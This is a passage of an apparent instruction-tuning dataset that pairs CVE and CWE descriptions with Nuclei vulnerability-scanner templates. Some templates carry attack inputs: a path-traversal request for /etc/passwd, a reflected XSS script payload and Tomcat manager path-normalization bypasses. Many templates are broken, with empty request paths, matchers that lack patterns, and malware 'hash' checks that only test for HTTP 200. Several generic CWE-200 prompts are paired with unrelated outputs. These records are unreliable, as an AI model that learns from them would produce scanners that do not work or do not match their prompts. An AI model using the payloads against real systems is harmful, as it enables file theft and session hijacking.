identified.\nThe response to the 'QUIT' command differs from real installations, signaling a possible deceptive setup.\n tags: redis,honeypot,ir,cti,network,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "redis-honeypot-detect"} +{"instruction": "Generate a Nuclei template for CVE-2020-5307", "input": "Title: SQL Injection in phpgurukul dairy_farm_shop_management_system\nSummary: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: phpgurukul dairy_farm_shop_management_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-5307\n\ninfo:\n name: PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection\n author: gy741\n severity: critical\n description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.\n tags: cve,cve2020,sqli,edb,phpgurukul,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"add-category.php\" \n part: header\n - type: status\n status:\n - 302", "category": "cve", "severity": "critical", "id": "CVE-2020-5307"} +{"instruction": "Generate a Nuclei template for CVE-2023-34843", "input": "Title: Path Traversal in traggo traggo\nSummary: Traggo Server 0.3.0 is vulnerable to directory traversal via a crafted GET request.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: traggo traggo\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-34843\n\ninfo:\n name: Traggo Server - Local File Inclusion\n author: DhiyaneshDk\n severity: high\n description: traggo/server version 0.3.0 is vulnerable to directory traversal.\n tags: cve2023,cve,traggo,lfi,server,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd\" \n matchers:\n - type: word\n words:\n - \"text/plain\" \n part: header\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-34843"} +{"instruction": "Generate a Nuclei template for: Emissary APT Malware Hash - Detect", "input": "Title: Emissary APT Malware Hash - Detect\nSummary: Emissary APT Malware Hash - Detect. Detect Emissary Malware - from samples A08E81B411.DAT, ishelp.dll\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: emissary-malware-hash\n\ninfo:\n name: Emissary APT Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: Detect Emissary Malware - from samples A08E81B411.DAT, ishelp.dll\n tags: malware,emissary,apt\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "emissary-malware-hash"} +{"instruction": "Generate a Nuclei template for CVE-2020-36333", "input": "Title: Vulnerability (CWE-306) in themegrill themegrill_demo_importer\nSummary: themegrill-demo-importer before 1.6.2 does not require authentication for wiping the database, because of a reset_wizard_actions hook.\nVulnerability Type: Vulnerability (CWE-306)\nSeverity: critical\nAffected Products: themegrill themegrill_demo_importer\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-36333\n\ninfo:\n name: ThemeGrill Demo Importer < 1.6.2 - Database Reset\n author: iamnoooob,pdresearch\n severity: critical\n description: ThemeGrill Demo Importer before 1.6.2 does not require authentication for wiping the database due to a reset_wizard_actions hook. In versions 1.3.4 and above and versions 1.6.1 and below, there is a vulnerability that allows any unauthenticated user to wipe the entire database to its default state after which they are automatically logged in as an administrator.\n tags: cve,cve2020,wp,wordpress,wp-plugin,themegrill,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2020-36333"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - IP-API EDNS", "input": "Title: Content-Security-Policy Bypass - IP-API EDNS\nSummary: Content-Security-Policy Bypass - IP-API EDNS. Tags: xss, csp-bypass, ip-api-edns\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: ip-api-edns-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - IP-API EDNS\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - IP-API EDNS\n tags: xss,csp-bypass,ip-api-edns,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"ip-api.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "ip-api-edns-csp-bypass"} +{"instruction": "Generate a Nuclei template for CVE-2024-8425", "input": "Title: Unrestricted File Upload in wpswings woocommerce_ultimate_gift_card\nSummary: The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\nVulnerability Type: Unrestricted File Upload\nSeverity: critical\nAffected Products: wpswings woocommerce_ultimate_gift_card\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-8425\n\ninfo:\n name: WooCommerce Ultimate Gift Card \u2264 2.6.0 - Arbitrary File Upload\n author: jsnv-dev\n severity: critical\n description: The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n tags: cve,cve2024,wp,wp-plugin,wordpress,woocommerce,woocommerce-ultimate-gift-card,file-upload,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"{{file_content}}\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2024-8425"} +{"instruction": "Generate a Nuclei template for CVE-2023-1389", "input": "Title: Vulnerability (CWE-77) in tp-link archer_ax21_firmware\nSummary: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.\nVulnerability Type: Vulnerability (CWE-77)\nSeverity: high\nAffected Products: tp-link archer_ax21_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-1389\n\ninfo:\n name: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection\n author: ritikchaddha\n severity: critical\n description: TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.\n tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-1389"} +{"instruction": "Generate a Nuclei template for: Symfony security.yml File Disclosure", "input": "Title: Symfony security.yml File Disclosure\nSummary: Symfony security.yml File Disclosure. Tags: symfony, devops, exposure\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: symfony-security\n\ninfo:\n name: Symfony security.yml File Disclosure\n author: DhiyaneshDK\n severity: info\n description: Symfony security.yml File Disclosure\n tags: symfony,devops,exposure,files,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/security.yml\" \n - \"{{BaseURL}}/config/security.yml\" \n - \"{{BaseURL}}/app/config/security.yml\" \n matchers:\n - type: word\n words:\n - \"security:\" \n - \"providers:\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "symfony-security"} +{"instruction": "Generate a Nuclei template for: CQL Native Transport Detect", "input": "Title: CQL Native Transport Detect\nSummary: CQL Native Transport Detect. Native transport requests (NTR) are any requests made via the CQL Native Protocol. CQL Native Protocol is the way the Cassandra driver communicates with the server.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cql-native-transport\n\ninfo:\n name: CQL Native Transport Detect\n author: pussycat0x\n severity: info\n description: Native transport requests (NTR) are any requests made via the CQL Native Protocol. CQL Native Protocol is the way the Cassandra driver communicates with the server.\n tags: network,cassandra,cql,detect,detection,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "cql-native-transport"} +{"instruction": "Generate a Nuclei template for: Abstract Api Image Processing Test", "input": "Title: Abstract Api Image Processing Test\nSummary: Abstract Api Image Processing Test. Manage your images programmatically with this powerful API compress, convert, crop, resize, and more.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-abstract-image-processing\n\ninfo:\n name: Abstract Api Image Processing Test\n author: daffainfo\n severity: info\n description: Manage your images programmatically with this powerful API compress, convert, crop, resize, and more.\n tags: token-spray,abstractapi\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"original_size\":\" \n - \"\"original_height\":\" \n - \"\"original_width\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-abstract-image-processing"} +{"instruction": "Generate a Nuclei template for CVE-2018-1000129", "input": "Title: Cross-Site Scripting (XSS) in jolokia jolokia\nSummary: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: jolokia jolokia\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-1000129\n\ninfo:\n name: Jolokia 1.3.7 - Cross-Site Scripting\n author: mavericknerd,0h1in9e,daffainfo\n severity: medium\n description: Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.\n tags: cve2018,cve,jolokia,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/jolokia/read?mimeType=text/html\" \n - \"{{BaseURL}}/jolokia/read?mimeType=text/html\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"java.lang.IllegalArgumentException\" \n - \"No type with name\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2018-1000129"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: activemq-panel\n\ninfo:\n name: Apache ActiveMQ Exposure\n author: pdteam,righettod\n severity: info\n description: An Apache ActiveMQ implementation was discovered.\n tags: panel,activemq,apache,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/\" \n - \"{{BaseURL}}/demo/\" \n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2019-17444", "input": "Title: Vulnerability (CWE-521) in jfrog artifactory\nSummary: Jfrog Artifactory uses default passwords (such as \"password\") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. This issue affects Jfrog Artifactory versions prior to 6.17.0.\nVulnerability Type: Vulnerability (CWE-521)\nSeverity: critical\nAffected Products: jfrog artifactory\nIndicators: unauthorized", "output": "id: CVE-2019-17444\n\ninfo:\n name: Jfrog Artifactory <6.17.0 - Default Admin Password\n author: pdteam\n severity: critical\n description: Jfrog Artifactory prior to 6.17.0 uses default passwords (such as \"password\") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory.\n tags: cve,cve2019,jfrog,default-login,-,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"name\":\"admin\"\" \n - \"\"admin\":true\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2019-17444"} +{"instruction": "Generate a Nuclei template for: Poseidon Group Malicious Word Document Hash - Detect", "input": "Title: Poseidon Group Malicious Word Document Hash - Detect\nSummary: Poseidon Group Malicious Word Document Hash - Detect. Detects Poseidon Group - Malicious Word Document\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: poseidongroup-maldoc-malware-hash\n\ninfo:\n name: Poseidon Group Malicious Word Document Hash - Detect\n author: pussycat0x\n severity: info\n description: Detects Poseidon Group - Malicious Word Document\n tags: malware,poseidon\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "poseidongroup-maldoc-malware-hash"} +{"instruction": "Generate a Nuclei template for CVE-2022-36553", "input": "Title: Vulnerability (CWE-77) in hytec hwl-2511-ss_firmware\nSummary: Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.\nVulnerability Type: Vulnerability (CWE-77)\nSeverity: critical\nAffected Products: hytec hwl-2511-ss_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-36553\n\ninfo:\n name: Hytec Inter HWL-2511-SS - Remote Command Execution\n author: HuTa0\n severity: critical\n description: Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.\n tags: cve2022,cve,hytec,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2022-36553"} +{"instruction": "Generate a Nuclei template for: Applezeed - SQL Injection", "input": "Title: Applezeed - SQL Injection\nSummary: Applezeed - SQL Injection. Applezeed's 'travel-details.php?id=' URL with possible time-based SQL injection (SQLi) vulnerability allows attackers to manipulate the 'id' parameter, potentially causing delays in SQL queries and unauthorized retrieval of travel information from the database\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: applezeed-sqli\n\ninfo:\n name: Applezeed - SQL Injection\n author: r3Y3r53\n severity: high\n description: Applezeed's 'travel-details.php?id=' URL with possible time-based SQL injection (SQLi) vulnerability allows attackers to manipulate the 'id' parameter, potentially causing delays in SQL queries and unauthorized retrieval of travel information from the database\n tags: time-based-sqli,sqli,unauth,applezeed,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "applezeed-sqli"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: call-break-cms\n\ninfo:\n name: Call Break CMS Panel - Detect\n author: dhiyaneshDk\n severity: info\n description: Call Break CMS panel was detected.\n tags: panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Call Break CMS\" \n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Xerox Workcentre Detect", "input": "Title: Xerox Workcentre Detect\nSummary: Xerox Workcentre Detect. Tags: tech, xerox, workcentre\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: xerox-workcentre-detect\n\ninfo:\n name: Xerox Workcentre Detect\n author: pussycat0x\n severity: info\n description: Xerox Workcentre Detect\n tags: tech,xerox,workcentre,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.dhtml\" \n matchers:\n - type: word\n words:\n - \"XEROX WORKCENTRE\" \n - \"/header.php?tab=status\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "xerox-workcentre-detect"} +{"instruction": "Generate a Nuclei template for CVE-2022-40022", "input": "Title: Vulnerability (CWE-77) in microchip syncserver_s650_firmware\nSummary: Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.\nVulnerability Type: Vulnerability (CWE-77)\nSeverity: critical\nAffected Products: microchip syncserver_s650_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-40022\n\ninfo:\n name: Symmetricom SyncServer Unauthenticated - Remote Command Execution\n author: DhiyaneshDK,mielverkerken\n severity: critical\n description: Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.\n tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 302\n - type: word\n words:\n - \"cloudflare\" \n part: header", "category": "cve", "severity": "critical", "id": "CVE-2022-40022"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: dockerhub\n\ninfo:\n name: DockerHub User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: DockerHub user name information check was conducted.\n tags: osint,osint-coding,dockerhub,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://hub.docker.com/v2/users/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"username\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Hewlett Packard LaserJet Printer - Default Login", "input": "Title: Hewlett Packard LaserJet Printer - Default Login\nSummary: Hewlett Packard LaserJet Printer - Default Login. HP printers often allow administrative access without requiring a password by default. This behavior enables anyone to log in as the Administrator without authentication, potentially exposing sensitive settings or functions.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: hp-printer-default-login\n\ninfo:\n name: Hewlett Packard LaserJet Printer - Default Login\n author: JohnAsbjorn\n severity: high\n description: HP printers often allow administrative access without requiring a password by default. This behavior enables anyone to log in as the Administrator without authentication, potentially exposing sensitive settings or functions.\n tags: hp,printer,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"User: Administrator\" \n - \"Sign out\" \n part: body\n condition: and\n - type: regex\n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "hp-printer-default-login"} +{"instruction": "Generate a Nuclei template for: WPS Hide Login Detection", "input": "Title: WPS Hide Login Detection\nSummary: WPS Hide Login Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-wps-hide-login\n\ninfo:\n name: WPS Hide Login Detection\n author: ricardomaia\n severity: info\n description: WPS Hide Login Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wps-hide-login/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-wps-hide-login"} +{"instruction": "Generate a Nuclei template for CVE-2025-53624", "input": "Title: Information Disclosure in CVE-2025-53624\nSummary: The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions prior to 4.0.0 are vulnerable to exposing GitHub Personal Access Tokens in production build artifacts when passed through plugin configuration options. The token, intended for build-time API access only, is inadvertently included in client-side JavaScript bundles, making it accessible to anyone who can view the website's source code. This vulnerability is fixed in 4.0.0.\nVulnerability Type: Information Disclosure\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-53624\n\ninfo:\n name: Docusaurus Gists Plugin < 4.0.0 - GitHub Personal Access Token Exposure\n author: darses\n severity: high\n description: The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions prior to 4.0.0 are vulnerable to exposing GitHub Personal Access Tokens in production build artifacts when passed through plugin configuration options. The token, intended for build-time API access only, is inadvertently included in client-side JavaScript bundles, making it accessible to anyone who can view the website's source code.\n tags: cve,cve2025,docusaurus,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n - \"{{BaseURL}}/{{js_file_url}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2025-53624"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: apache-tomcat-manager-path-normalization\n\ninfo:\n name: Apache Tomcat Manager Path Normalization Panel - Detect\n author: brenocss,organiccrap\n severity: info\n description: Apache Tomcat Manager Path Normalization login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target operating system.\n tags: panel,tomcat,apache,misconfig,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/..;/manager/html\" \n - \"{{BaseURL}}/..;/..;/manager/html;/\" \n - \"{{BaseURL}}/..;/host-manager/html\" \n - \"{{BaseURL}}/..;/..;/host-manager/html;/\" \n - \"{{BaseURL}}/{{randstr}}/..;/manager/html\" \n - \"{{BaseURL}}/{{randstr}}/..;/host-manager/html\" \n matchers:\n - type: word\n words:\n - \"username=\"tomcat\" password=\"s3cret\"\" \n - \"manager-gui\" \n condition: and\n - type: status\n status:\n - 403", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: axigen-webadmin\n\ninfo:\n name: Axigen Web Admin Detection\n author: dhiyaneshDk\n severity: info\n description: An Axigen Web Admin panel was discovered.\n tags: axigen,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Axigen\u00a0WebAdmin\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: SUSE Manager Server - Panel", "input": "Title: SUSE Manager Server - Panel\nSummary: SUSE Manager Server - Panel. SUSE Manager login panel detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: suse-manager-panel\n\ninfo:\n name: SUSE Manager Server - Panel\n author: darses\n severity: info\n description: SUSE Manager login panel detected.\n tags: panel,detect,suse,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"SUSE Manager - Sign In\" \n - \"SUSE Multi-Linux Manager - Sign In\" \n - \"Uyuni - Sign In\" \n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "suse-manager-panel"} +{"instruction": "Generate a Nuclei template for: Go.mod Disclosure", "input": "Title: Go.mod Disclosure\nSummary: Go.mod Disclosure. go.mod internal file is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: go-mod-disclosure\n\ninfo:\n name: Go.mod Disclosure\n author: DhiyaneshDk\n severity: low\n description: go.mod internal file is exposed.\n tags: exposure,files,go,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/go.mod\" \n matchers:\n - type: word\n words:\n - \"module\" \n - \"go\" \n - \"require (\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "go-mod-disclosure"} +{"instruction": "Generate a Nuclei template for CVE-2023-45542", "input": "Title: Cross-Site Scripting (XSS) in moosocial moosocial\nSummary: Cross Site Scripting vulnerability in mooSocial 3.1.8 allows a remote attacker to obtain sensitive information via a crafted script to the q parameter in the Search function.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: moosocial moosocial\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-45542\n\ninfo:\n name: MooSocial 3.1.8 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n tags: cve2023,cve,xss,moosocial,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/search/index/?q=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2023-45542"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: weheartit\n\ninfo:\n name: Weheartit User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Weheartit user name information check was conducted.\n tags: osint,osint-social,weheartit,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://weheartit.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \" on We Heart It\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: webcamxp-5\n\ninfo:\n name: WebcamXP 5 Login Panel - Detect\n author: dhiyaneshDK\n severity: info\n description: WebcamXP 5 login panel was detected.\n tags: iot,edb,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/home.html\" \n matchers:\n - type: word\n words:\n - \"webcamXP 5\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: parallels-hsphere-detect\n\ninfo:\n name: Parallels H-Sphere Login Panel - Detect\n author: ritikchaddha\n severity: info\n description: Parallels H-Sphere login panel was detected.\n tags: panel,parallels,hsphere,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Parallels H-Sphere\" \n - \"H-SPHERE\" \n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: FortiClient Endpoint Management Server Panel - Detect", "input": "Title: FortiClient Endpoint Management Server Panel - Detect\nSummary: 